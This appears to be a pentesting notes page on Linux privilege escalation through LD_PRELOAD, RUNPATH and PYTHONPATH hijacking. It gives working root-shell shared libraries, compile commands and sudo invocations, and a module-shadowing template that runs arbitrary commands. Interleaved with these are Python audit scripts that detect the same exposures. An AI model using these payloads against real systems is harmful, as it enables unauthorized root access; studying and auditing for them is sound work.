Linux Privilege Escalation with Library

Contains the details of the topic Privilege Escalation/Linux/Functionality/Library.

LD_PRELOAD

The LD_PRELOAD environment variable tells the dynamic linker to load a given shared library before any other when a dynamically linked binary starts. Functions exported by that library take precedence over the same-named functions in the libraries loaded afterwards. The idea is therefore to make a privileged binary load a malicious library.

Requirements

  • Be able to set the LD_PRELOAD environment variable for the target process.

  • A dynamically linked executable that can be run through sudo (SUDOERS) or that carries the SUID bit.

Enumeration

ldd <BINARY_SUDOERS_SUID>

Attack

Create the library mylib.c

mylib.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* _init runs when the loader maps the library, before main() of the target
   binary. The library is built with -nostartfiles so this definition does
   not clash with the default crt _init. */
void _init() {
    unsetenv("LD_PRELOAD");   /* keep the spawned shell from preloading again */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

Compile the library

gcc -fPIC -shared -o /tmp/mylib.so mylib.c -nostartfiles

Use the library with LD_PRELOAD

sudo LD_PRELOAD=/tmp/mylib.so <SUDOERS_COMMAND>
LD_PRELOAD=/tmp/mylib.so <SUID_BINARY>
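Added check (example code written for this page, not part of the original notes): the two requirements above can be verified from `sudo -l` output without running anything as root. sudo's default env_reset strips LD_PRELOAD, so it reaches the command only if the policy lists it in env_keep; and only a dynamically linked ELF consults the dynamic linker, so only those honour the variable. Note also that glibc's ld.so runs SUID binaries in secure-execution mode, where LD_PRELOAD entries containing a slash are ignored, so the SUID variant of the command above is normally defeated by the loader and the sudo route is the one worth auditing. The `sudo -l` text and the ELF image built by `minimal_elf64` are constructed for the test.

```python
"""LD_PRELOAD exposure check for sudo rules (added example, not the page's code)."""
import re
import struct

# Constructed sample of `sudo -l` output (not captured from a real host).
SAMPLE_SUDO_L = """\
Matching Defaults entries for user on host:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User user may run the following commands on host:
    (root) NOPASSWD: /usr/sbin/iftop, /usr/bin/find
"""

# "(root) NOPASSWD: /usr/bin/find" -> group 1 is the comma-separated command list
SPEC_RE = re.compile(r"^\s*\([^)]*\)\s*(?:[A-Z_]+:\s*)*(.+?)\s*$")


def kept_env_vars(sudo_l_output):
    """Variable names sudo preserves, taken from env_keep in the Defaults block."""
    kept, in_defaults = set(), False
    for line in sudo_l_output.splitlines():
        if line.startswith("Matching Defaults"):
            in_defaults = True
            continue
        if line and not line[0].isspace():
            in_defaults = False
        if not in_defaults:
            continue
        # env_keep+=LD_PRELOAD  or  env_keep+="LD_PRELOAD LD_LIBRARY_PATH"
        for m in re.finditer(r'env_keep\+?=("[^"]*"|[^,\s]+)', line):
            kept.update(m.group(1).strip('"').split())
    return kept


def allowed_commands(sudo_l_output):
    """Command specs sudo permits, from the 'may run the following commands' block."""
    cmds, in_cmds = [], False
    for line in sudo_l_output.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        m = SPEC_RE.match(line) if in_cmds else None
        if m:
            cmds.extend(c.strip() for c in m.group(1).split(","))
    return cmds


def elf_is_dynamic(data):
    """True if the ELF image carries a PT_INTERP or PT_DYNAMIC program header."""
    if data[:4] != b"\x7fELF":
        return False
    is64 = data[4] == 2
    end = "<" if data[5] == 1 else ">"
    if is64:
        (phoff,) = struct.unpack_from(end + "Q", data, 32)
        phentsize, phnum = struct.unpack_from(end + "HH", data, 54)
    else:
        (phoff,) = struct.unpack_from(end + "I", data, 28)
        phentsize, phnum = struct.unpack_from(end + "HH", data, 42)
    for i in range(phnum):
        (p_type,) = struct.unpack_from(end + "I", data, phoff + i * phentsize)
        if p_type in (2, 3):  # PT_DYNAMIC, PT_INTERP
            return True
    return False


def is_dynamic_elf(path):
    """Read a binary from disk and classify it; unreadable paths count as not dynamic."""
    try:
        with open(path, "rb") as f:
            return elf_is_dynamic(f.read())
    except OSError:
        return False


def exposed_commands(sudo_l_output, is_dynamic=is_dynamic_elf):
    """Allowed commands that would load an LD_PRELOAD library when run via sudo."""
    if "LD_PRELOAD" not in kept_env_vars(sudo_l_output):
        return []
    return [c for c in allowed_commands(sudo_l_output)
            if c.startswith("/") and is_dynamic(c)]


def minimal_elf64(dynamic):
    """Constructed 64-bit ELF header plus one program header, used only for testing."""
    p_type = 3 if dynamic else 1  # PT_INTERP vs PT_LOAD
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    ehdr += struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0, 64, 0, 0, 64, 56, 1, 0, 0, 0)
    phdr = struct.pack("<IIQQQQQQ", p_type, 0, 0, 0, 0, 0, 0, 0)
    return ehdr + phdr


if __name__ == "__main__":
    print(exposed_commands(SAMPLE_SUDO_L, is_dynamic=lambda p: True))
```

On a real host, feed the actual output of `sudo -l` to `exposed_commands` with the default `is_dynamic`; an empty result means either the policy does not keep LD_PRELOAD or none of the allowed commands is a dynamically linked ELF.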

RUNPATH

The RUNPATH entry in a binary's dynamic section lists directories the dynamic linker searches for shared libraries before the system default directories. If one of those directories is user-writable, it is possible to have the binary load a malicious library from it.

Requirements

  • A dynamically linked binary that can be run through sudo (SUDOERS) or that carries the SUID bit.

  • That binary must have RUNPATH set to a directory we can write to.

Enumeration

readelf -d <BINARY_SUDOERS_SUID> | grep PATH
# Shows whether a RUNPATH (or RPATH) is set and which directories it points to
ldd <BINARY_SUDOERS_SUID>
# Names of the shared libraries the binary requires and where each is resolved from
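Added check (example code for this page, not from the original notes): the enumeration above asks two questions, which libraries the binary needs and where RUNPATH/RPATH makes the loader look first. This parses the `readelf -d` output for NEEDED and RUNPATH/RPATH rows, expands `$ORIGIN` to the binary's own directory as ld.so does, and reports every needed library for which a writable (or creatable) directory is consulted before a legitimate copy is found. RUNPATH is part of the binary itself, so it is honoured even where the loader ignores environment variables such as LD_LIBRARY_PATH (glibc does restrict `$ORIGIN` expansion for set-user-ID programs, so a literal directory is the interesting case there). The readelf text is constructed; `demo_with_temp_dir` creates a writable directory to exercise the check.

```python
"""RUNPATH / RPATH hijack exposure check (added example, not the page's code)."""
import os
import re
import subprocess
import tempfile

# Matches the NEEDED, RUNPATH and RPATH rows printed by `readelf -d`.
DYN_RE = re.compile(r"\((NEEDED|RUNPATH|RPATH)\)\s+[^\[]*\[([^\]]*)\]")

# Constructed sample of `readelf -d` output; not taken from a real binary.
SAMPLE_READELF_D = """\
Dynamic section at offset 0x2d88 contains 27 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libcustom.so]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 0x000000000000001d (RUNPATH)            Library runpath: [/opt/app/lib:$ORIGIN/../lib]
 0x000000000000000c (INIT)               0x1000
"""


def parse_dynamic(readelf_text):
    """Return (needed_libs, search_dirs) from `readelf -d` output.
    RUNPATH/RPATH values are colon-separated lists, kept in search order."""
    needed, dirs = [], []
    for tag, value in DYN_RE.findall(readelf_text):
        if tag == "NEEDED":
            needed.append(value)
        else:
            dirs.extend(d for d in value.split(":") if d)
    return needed, dirs


def expand_origin(directory, binary_path):
    """Expand $ORIGIN / ${ORIGIN} to the directory holding the binary."""
    origin = os.path.dirname(os.path.abspath(binary_path))
    return os.path.normpath(directory.replace("${ORIGIN}", origin).replace("$ORIGIN", origin))


def user_can_write(directory):
    """True if the directory is writable, or does not exist but its nearest
    existing ancestor is writable (so the current user could create it)."""
    path = directory
    while not os.path.isdir(path):
        parent = os.path.dirname(path)
        if parent == path:  # reached the root without finding a directory
            return False
        path = parent
    return os.access(path, os.W_OK)


def hijackable_libraries(readelf_text, binary_path):
    """(directory, library) pairs where the loader would consult a user-writable
    RUNPATH/RPATH directory before finding a legitimate copy of a needed library."""
    needed, dirs = parse_dynamic(readelf_text)
    findings = []
    for lib in needed:
        for d in dirs:
            full = expand_origin(d, binary_path)
            if user_can_write(full):
                findings.append((full, lib))
                break  # the first writable directory in search order is enough
            if os.path.exists(os.path.join(full, lib)):
                break  # real copy found first; later directories are not consulted
    return findings


def readelf_dynamic(binary_path):
    """Run `readelf -d` on a real binary (needs binutils); feed the result to the parser."""
    return subprocess.run(["readelf", "-d", binary_path],
                          capture_output=True, text=True, check=True).stdout


def demo_with_temp_dir():
    """Constructed scenario: RUNPATH pointing at a fresh, user-writable directory.
    Returns that directory and the findings for the sample binary."""
    d = tempfile.mkdtemp()
    text = SAMPLE_READELF_D.replace("/opt/app/lib:$ORIGIN/../lib", d)
    return d, hijackable_libraries(text, os.path.join(d, "app"))


if __name__ == "__main__":
    print(demo_with_temp_dir())
```

On a real binary use `hijackable_libraries(readelf_dynamic(path), path)`; a non-empty result lists the directory to fix (ownership or mode) and the library name that would be resolved from it.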

Attack

First try replacing the library in the directory pointed to by RUNPATH with a different one, e.g. /lib/x86_64-linux-gnu/libc.so.6, and check the error the binary returns: it usually names the functions it cannot find.

Then create a library with the same name as the one expected in the RUNPATH directory, exporting the required functions

mylib.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs when the loader maps the library (built with -nostartfiles). */
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

/* Export every symbol the binary complained about so the loader does not
   fail on a missing function; the body can stay empty. */
void <FUNCTION_NAME_REQUIRED>() {}

The body of _init can also be placed inside the required function itself; it then runs when the binary calls that function rather than at load time.

Compile the library

gcc -fPIC -shared -o <NAME_SHARED_LIBRARY_IN_RUNPATH> mylib.c -nostartfiles

Run the binary normally

sudo <SUDOERS_COMMAND>
./<SUID_BINARY>

PYTHONPATH

Requirements

  • A Python script that can be run through sudo (SUDOERS).

  • Knowledge of the modules the script imports and of the functions it uses from them.

  • One of the following holds:
    • the imported module lives in a directory we can write to; or
    • among the paths Python searches for modules, we can write to a path with higher priority than the one holding the imported module; or
    • the PYTHONPATH environment variable (which tells Python which directories to search first for modules) can be set by us.

Warning: the SUID bit has no effect on interpreted scripts (such as Python), so only the sudo route applies here.

Enumeration

python3 -c 'import sys; print("\n".join(sys.path))'
# Directories Python imports modules from, in priority order (the script's own folder is searched first)
pip3 show <MODULE>
# Installation location of a given module
echo $PYTHONPATH
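Added check (example code for this page, not part of the original notes) covering the three requirement variants above: given a module name and the interpreter's search path, it locates the directory the module really loads from and lists every directory searched before it that the current user can write to or create; a same-named .py file there would be imported instead. It also reports whether the real module file itself is writable. sudo's default environment reset drops PYTHONPATH, so the third variant applies only when the policy keeps it; pass the list printed by the enumeration command above (run the way the script would run) as `search_path`. The `demo` function builds a constructed layout in a temp directory; the module name `helper` and the directories `good/` and `evil/` are invented for it.

```python
"""Python module shadowing check for scripts run via sudo (added example, not the page's code)."""
import os
import sys
import tempfile


def _base(entry):
    """sys.path entries may be '' (meaning the current directory)."""
    return entry or os.getcwd()


def module_location(name, search_path):
    """Directory the module would load from: the first entry holding name.py
    or name/__init__.py (C extensions and built-in modules are not modelled)."""
    for entry in search_path:
        base = _base(entry)
        if (os.path.isfile(os.path.join(base, name + ".py"))
                or os.path.isfile(os.path.join(base, name, "__init__.py"))):
            return base
    return None


def writable_or_creatable(directory):
    """True if the user can write into the directory, or could create it
    because the parent directory is writable."""
    if os.path.isdir(directory):
        return os.access(directory, os.W_OK)
    parent = os.path.dirname(directory.rstrip(os.sep)) or os.sep
    return os.path.isdir(parent) and os.access(parent, os.W_OK)


def audit_module(name, search_path=None):
    """Report how an import of `name` could be redirected.

    Returns the real location, the writable directories searched before it
    (a same-named file there wins), and whether the module file is writable."""
    search_path = list(sys.path if search_path is None else search_path)
    real = module_location(name, search_path)
    shadowing = []
    for entry in search_path:
        base = _base(entry)
        if real is not None and os.path.abspath(base) == os.path.abspath(real):
            break  # reached the directory the real module comes from
        if writable_or_creatable(base):
            shadowing.append(base)
    module_file = None
    if real is not None:
        candidate = os.path.join(real, name + ".py")
        module_file = candidate if os.path.isfile(candidate) else os.path.join(real, name, "__init__.py")
    return {
        "location": real,
        "shadowing_dirs": shadowing,
        "module_writable": bool(module_file and os.access(module_file, os.W_OK)),
    }


def demo():
    """Constructed layout: the real module lives in good/, and an empty
    user-writable evil/ is searched first. Returns both directories and the
    audits with evil/ first and with good/ first."""
    root = tempfile.mkdtemp()
    good = os.path.join(root, "good")
    evil = os.path.join(root, "evil")
    os.mkdir(good)
    os.mkdir(evil)
    with open(os.path.join(good, "helper.py"), "w") as f:
        f.write("def run():\n    return 'legitimate helper'\n")
    return good, evil, audit_module("helper", [evil, good]), audit_module("helper", [good, evil])


if __name__ == "__main__":
    print(demo())
```

For a script deployed under sudo, the first search entry is the script's own directory, so `shadowing_dirs` containing that directory means the script's folder itself is writable; fixing ownership and modes on the directories reported (and on the module file when `module_writable` is true) closes all three variants.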

Attack

One of the following, matching the three requirement variants:

  • Add the desired code inside the function of the (writable) module imported by the script run through sudo.

  • Create a Python file with the same name as the imported module in a higher-priority search directory, implementing the function the script uses with the desired code inside it.

  • Set the PYTHONPATH environment variable to a user-writable directory so that Python searches it first, then continue as in the second variant.

sudo PYTHONPATH=<WRITABLE_DIRECTORY> python3 <SCRIPT>

<MODULE>.py
def <FUNCTION_NAME>():
    ...   # any original body of the function stays here
    import os
    os.system('<COMMAND>')

Last updated 8 months ago
